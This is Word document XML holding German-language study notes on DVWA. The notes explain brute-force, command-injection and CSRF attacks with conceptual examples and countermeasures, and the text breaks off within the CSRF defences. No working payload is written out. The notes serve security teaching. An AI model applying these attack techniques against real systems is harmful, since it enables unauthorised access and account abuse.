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165C2" w14:textId="3073DE8A" w:rsidR="00071616" w:rsidRDefault="0034694F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D6804E" w14:textId="36EDDD6B" w:rsidR="0034694F" w:rsidRPr="0034694F" w:rsidRDefault="0034694F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Brute Force:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03407636" w14:textId="77777777" w:rsidR="0034694F" w:rsidRPr="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Funktionsweise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B039C5B" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:t>Ein Brute-Force-Angriff startet mit der ersten möglichen Kombination aus dem definierten Zeichensatz (zum Beispiel aaaaaa) und probiert dann systematisch jede mögliche Kombination aus, bis die korrekte gefunden ist. Die Reihenfolge der Versuche kann variieren, folgt aber typischerweise einer vorhersehbaren Sequenz. Die Komplexität und damit die benötigte Zeit für einen Brute-Force-Angriff hängen direkt von der Länge und Komplexität des Passworts oder Schlüssels ab. Ein Passwort, das nur aus sechs Kleinbuchstaben besteht, wäre zum Beispiel viel schneller zu knacken als ein Passwort, das eine Mischung aus Groß- und Kleinbuchstaben, Zahlen und Sonderzeichen über eine Länge von 12 Zeichen verwendet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1A2E74" w14:textId="77777777" w:rsidR="0034694F" w:rsidRPr="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34922561" w14:textId="77777777" w:rsidR="0034694F" w:rsidRPr="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Einschränkungen und Gegenmaßnahmen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B0CE4E" w14:textId="77777777" w:rsidR="0034694F" w:rsidRPr="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Komplexität und Länge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE77EE5" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:t>Je länger und komplexer das Ziel (z.B. Passwort), desto mehr mögliche Kombinationen gibt es, was die Zeit, die für einen erfolgreichen Brute-Force-Angriff benötigt wird, exponentiell erhöht. Moderne Verschlüsselungsstandards und Passwortrichtlinien machen Brute-Force-Angriffe oft unpraktikabel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2585E0" w14:textId="77777777" w:rsidR="0034694F" w:rsidRPr="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DFBFAFF" w14:textId="77777777" w:rsidR="0034694F" w:rsidRPr="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>Rate Limiting und Account-Sperrung</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D8E061" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:t>Viele Systeme implementieren Sicherheitsmaßnahmen wie Rate Limiting oder sperren den Zugang zu einem Account nach einer bestimmten Anzahl von fehlgeschlagenen Anmeldeversuchen. Dies kann Brute-Force-Angriffe erheblich verlangsamen oder ganz verhindern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B446C27" w14:textId="77777777" w:rsidR="0034694F" w:rsidRPr="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3924B79D" w14:textId="77777777" w:rsidR="0034694F" w:rsidRPr="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Captchas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA4E36D" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:t>Durch die Verwendung von Captchas können Websites automatisierte Anmeldeversuche erkennen und blockieren, da diese Mechanismen menschliche Interaktion erfordern, um fortzufahren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B4482" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD8E879" w14:textId="77777777" w:rsidR="0034694F" w:rsidRPr="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Anwendungsbeispiele</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC09221" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:t>Brute-Force-Angriffe können in verschiedenen Szenarien eingesetzt werden, darunter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6833E691" w14:textId="70AED224" w:rsidR="0034694F" w:rsidRPr="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passwort-Knacken:</w:t>
      </w:r>
      <w:r w:rsidRPr="0034694F">
        <w:t xml:space="preserve"> Der klassische Einsatzfall, bei dem das Passwort eines Benutzerkontos durch Ausprobieren aller möglichen Kombinationen ermittelt wird.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2141FD" w14:textId="77777777" w:rsidR="0034694F" w:rsidRPr="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entschlüsselung:</w:t>
      </w:r>
      <w:r w:rsidRPr="0034694F">
        <w:t xml:space="preserve"> Bei der Entschlüsselung ohne den entsprechenden Schlüssel kann versucht werden, den Schlüssel durch Brute-Force zu ermitteln.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ED3D4F" w14:textId="77777777" w:rsidR="0034694F" w:rsidRPr="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PINs und Zugangscodes</w:t>
      </w:r>
      <w:r w:rsidRPr="0034694F">
        <w:t>: Einfache numerische Codes wie PINs sind besonders anfällig für Brute-Force-Angriffe wegen ihrer geringen Länge und des begrenzten Zeichensatzes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3748215B" w14:textId="79E1C4E7" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BD6310A" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6176ACFE" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA0CA5A" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command Injection:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Funktionsweise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7FA474" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Die Schwachstelle entsteht oft in Webanwendungen, die Benutzereingaben akzeptieren und diese in einem Systembefehl verwenden. Wenn ein Entwickler vergisst, diese Eingaben zu validieren oder zu bereinigen, kann ein Angreifer schädliche Befehle einschleusen, die neben den ursprünglichen, harmlosen Befehlen ausgeführt werden. Die Angriffe nutzen oft spezielle Steuerzeichen wie Semikolons (;), Pipes (|), oder logische Operatoren (&amp;&amp;, ||), um zusätzliche Befehle anzuhängen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D4D41B" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD9BABF" w14:textId="77777777" w:rsidR="0034694F" w:rsidRPr="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Beispiele</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B71D8C3" w14:textId="45A228B0" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Angenommen, eine Webanwendung verwendet Benutzereingaben, um einen Ping-Test durchzuführen. Der Benutzer gibt eine IP-Adresse oder einen Hostnamen ein, und die Anwendung führt einen Ping-Befehl auf dem Server aus. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5995B829" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28EDD224" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>In diesem Fall würde die Anwendung zuerst den Ping-Befehl ausführen und anschließend den folgenden Befehl, der potenziell das Dateisystem des Servers löschen könnte, wenn er mit den entsprechenden Berechtigungen ausgeführt wird.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A3730A" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="078116CF" w14:textId="77777777" w:rsidR="0034694F" w:rsidRPr="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gegenmaßnahmen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E54C44F" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Um Command Injection zu verhindern, sollten Entwickler folgende Sicherheitspraktiken anwenden:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FC04FC" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2357FBCF" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eingabevalidierung</w:t>
      </w:r>
      <w:r>
        <w:t>: Einschränkung der akzeptierten Eingaben durch Verwendung von Whitelists. Nur spezifisch erlaubte Werte und Formate sollten akzeptiert werden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0163F9E3" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Eingabedesinfizierung: Entfernen oder Ersetzen von potenziell schädlichen Zeichen in den Eingaben.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73762A17" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verwendung von sicheren APIs:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Anstatt Systembefehle direkt auszuführen, sollten sichere APIs oder spezielle Bibliotheken verwendet werden, die das Risiko von Command Injection minimieren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1739B024" w14:textId="77777777" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0034694F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Geringste Berechtigungen:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ausführung von Anwendungsprozessen mit den minimal notwendigen Berechtigungen, um die Auswirkungen eines möglichen Angriffs zu begrenzen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FF067E" w14:textId="1B2716CB" w:rsidR="0034694F" w:rsidRDefault="0034694F" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Verwendung von externen Prozessoren: Wenn möglich, sollten externe Prozesse vermieden oder durch Anwendungsfunktionen ersetzt werden, die keine Befehlsausführung im Betriebssystem ermöglichen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315A268E" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F085CBA" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42051CE0" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B09190" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0871EF04" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7737CA83" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA5397B" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="005EB678" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0351A412" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="0034694F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348698F6" w14:textId="5EFEBD89" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Cross-Site Request Forgery (CSRF oder XSRF) ist eine Art von Sicherheitsangriff, bei dem ein Angreifer einen Benutzer dazu bringt, ungewollte Aktionen auf einer Webanwendung auszuführen, in der er bereits authentifiziert ist. CSRF-Attacken zielen darauf ab, die Vertrauensstellung auszunutzen, die eine Webanwendung dem Browser eines authentifizierten Benutzers entgegenbringt. Durch diese Angriffe können Angreifer Aktionen im Namen des Benutzers durchführen, ohne dass dieser seine Zustimmung gibt oder davon Kenntnis nimmt. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA6F068" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616193DB" w14:textId="77777777" w:rsidR="00013E60" w:rsidRPr="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Funktionsweise von CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77721CBC" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session Riding:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Der Kern eines CSRF-Angriffs besteht darin, dass der Angreifer eine Anfrage im Namen des Opfers an eine Webanwendung sendet, während das Opfer dort eingeloggt ist. Der Angreifer muss nicht die Anmeldedaten des Opfers kennen; es reicht aus, wenn das Opfer eine gültige Session mit der Anwendung hat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC552E1" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000961E0" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ausnutzung von Vertrauen</w:t>
      </w:r>
      <w:r>
        <w:t>: Die Webanwendung kann nicht unterscheiden, ob die Anfrage direkt vom Benutzer oder durch den Angreifer initiiert wurde. Wenn die Anwendung keine speziellen Schutzmechanismen implementiert hat, wird die Anfrage als legitim behandelt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FC83A7" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C5356C4" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verbreitungswege:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF-Angriffe können über verschiedene Kanäle verbreitet werden, darunter betrügerische E-Mails, soziale Netzwerke oder andere Webseiten. Ein häufiges Szenario ist das Einbetten eines unsichtbaren Bildes oder eines iframe in eine Webseite oder E-Mail, die eine Anfrage an die Zielanwendung sendet, sobald das Opfer die Seite lädt oder die E-Mail öffnet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14346E13" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6F7A23" w14:textId="77777777" w:rsidR="00013E60" w:rsidRPr="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Beispiele für CSRF-Angriffe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AD6322" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Ein Benutzer ist auf seiner Bankwebseite eingeloggt und öffnet in einem anderen Tab eine infizierte Webseite, die eine unsichtbare Anfrage an die Bank sendet, um Geld zu überweisen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C1080F" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Ein Angreifer sendet eine E-Mail mit einem Link, der, wenn angeklickt, eine Aktion auf einer Webseite ausführt, wo das Opfer aktuell angemeldet ist, wie zum Beispiel das Posten eines Kommentars in einem Forum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5F1931" w14:textId="77777777" w:rsidR="00013E60" w:rsidRPr="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gegenmaßnahmen gegen CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E563C4C" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CSRF-Token</w:t>
      </w:r>
      <w:r>
        <w:t>: Die wirksamste Schutzmaßnahme ist die Verwendung von Anti-CSRF-Token. Diese Token sind einzigartige, zufällige Werte, die der Server bei jeder Formularanfrage generiert und überprüft. Da der Angreifer den Token-Wert nicht kennt, kann er keine gültige Anfrage formulieren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D542518" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SameSite-Cookie-Attribut:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Moderne Browser unterstützen das SameSite-Attribut für Cookies, das steuert, wie Cookies in Cross-Site-Anfragen behandelt werden. Das Setzen des Attributs auf Strict oder Lax kann CSRF-Angriffe verhindern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202002BB" w14:textId="77777777" w:rsidR="00013E60" w:rsidRDefault="00013E60" w:rsidP="00013E60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00013E60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Überprüfung des HTTP Referers</w:t>
      </w:r>
      <w:r>
